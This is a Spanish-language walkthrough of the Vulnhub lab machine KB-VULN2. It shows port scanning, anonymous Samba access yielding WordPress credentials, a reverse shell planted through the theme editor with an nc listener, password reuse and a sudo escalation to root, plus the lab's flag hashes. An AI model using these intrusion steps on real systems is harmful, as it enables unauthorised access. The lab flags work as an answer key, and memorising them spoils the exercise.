[VULNHUB] KB-VULN2

Hoy vamos a hackear la maquina de Vulnhub llamada KB-VULN2. Podeis descargarla desde el siguiente enlace: KB-VULN2

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.
 
~ > nmap -A -p- 192.168.1.102                                                                                                                          
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-28 11:45 CEST
Nmap scan report for 192.168.1.102
Host is up (0.0024s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; 
protocol 2.0)
| ssh-hostkey: 
|   2048 5e:99:01:23:fe:c4:84:ef:14:55:87:da:a3:30:6f:50 (RSA)
|   256 cb:8e:e1:b3:3a:6e:64:9e:0f:53:39:7e:18:9d:8b:3f (ECDSA)
|_  256 ec:3b:d9:53:4a:5a:f7:32:f2:3a:f7:a7:6f:31:87:52 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC:  
(unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: kb-server
|   NetBIOS computer name: UBUNTU\x00
|   Domain name: \x00
|   FQDN: kb-server
|_  System time: 2020-09-28T09:45:55+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-28 11:45:54
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
Vemos que tiene el puerto de samba abierto, y tiene el directorio Anonymous, asi que nos conectamos.

~ > smbclient \\\\192.168.1.102\\Anonymous
mkdir failed on directory /var/run/samba/msg.lock: Permiso denegado
Unable to initialize messaging context
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Sep 17 12:58:56 2020
  ..                                  D        0  Wed Sep 16 12:36:09 2020
  backup.zip                          N 16735117  Thu Sep 17 12:58:56 2020

		14380040 blocks of size 1024. 8497088 blocks available
smb: \> 
Nos descargamos el fichero backup.zip.

smb: \> get backup.zip
getting file \backup.zip of size 16735117 as backup.zip (71995,1 KiloBytes/sec) 
(average 71995,1 KiloBytes/sec)
smb: \> 
Lo extraemos.

~ > unzip backup.zip
Vemos que extrae una carpeta "wordpress" y el fichero remember_me.txt. Si miramos el fichero vemos que contiene unos credenciales...

~ > cat remember_me.txt
Username:admin
Password:MachineBoy141
Por otro lado, usamos gobuster para ver si encontramos algun directorio interesante.

~ > gobuster dir -u http://192.168.1.102 -w 
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt     
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.102
[+] Threads:        10
[+] Wordlist:       
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/28 11:55:37 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/09/28 11:55:39 Finished
===============================================================
Encontramos el directorio "wordpress". Visitamos http://kb-vuln/wordpress/wp-admin y nos logueamos usando los credenciales que hemos encontrado anteriormente.

Username:admin
Password:MachineBoy141
Vamos a Themes y activamos el theme Twenty seventeen. Appearance -> Activate seventeen. Una vez activado vamos a Theme Editor y editamos el fichero header.php para agregarle una una reverse shell. Ponemos nc a la escucha.

~ > nc -nlvp 1234
listening on [any] 1234 ...
Y visitamos: kb.vuln/wordpress/

Low Shell



~ > nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.102] 40476
Linux kb-server 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux
 10:09:56 up 24 min,  0 users,  load average: 0.01, 0.02, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$python3 -c 'import pty;pty.spawn("/bin/bash");'

user.txt



www-data@kb-server:/home/kbadmin$ ls
note.txt  user.txt
www-data@kb-server:/home/kbadmin$ cat user.txt
03bf4d20dac5644c75e69e40bad48db0
Exploramos el sistema y vemos que hay un usuario llamado kbadmin. Usamos la misma password que hemos usado para logarnos al wordpress pero esta vez para logarnos como el usuario kbadmin.

www-data@kb-server:/home/kbadmin$ su kbadmin
Password: MachineBoy141
kbadmin@kb-server:~$ 

Privile Escalation


Miramos si kbadmin puede usar sudo.

kbadmin@kb-server:~$ sudo -l
Matching Defaults entries for kbadmin on kb-server:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User kbadmin may run the following commands on kb-server:
    (ALL : ALL) ALL
Vemos que puede hacer todo con sudo :)

root.txt



kbadmin@kb-server:~$ sudo su
root@kb-server:/home/kbadmin# cd ~
root@kb-server:~# ls
flag.txt
root@kb-server:~# cat flag.txt
dc387b4cf1a4143f562dd1bdb3790ff1

End


Y con esto ya seriamos root de la maquina.